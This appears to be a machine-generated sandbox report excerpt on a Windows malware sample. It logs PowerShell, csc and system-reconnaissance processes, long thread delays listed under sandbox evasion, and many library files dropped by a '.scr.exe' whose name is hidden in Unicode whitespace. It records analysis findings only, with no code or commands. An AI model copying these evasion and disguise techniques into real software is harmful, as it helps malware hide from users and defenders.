Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\getmac.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID=&quot;1&quot;} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element=&quot;Win32_NetworkAdapter.DeviceID=\&quot;1\&quot;&quot;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4083 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3541 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3324
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 848
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2954
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 597
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3837
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 825
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4659
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3229
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2760
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 998
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\_bz2.pyd Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-debug-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\_sqlite3.pyd Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\_socket.pyd Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-errorhandling-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\_decimal.pyd Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\_ctypes.pyd Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\_hashlib.pyd Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\_queue.pyd Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\_lzma.pyd Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-console-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\select.pyd Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-datetime-l1-1-0.dll Jump to dropped file
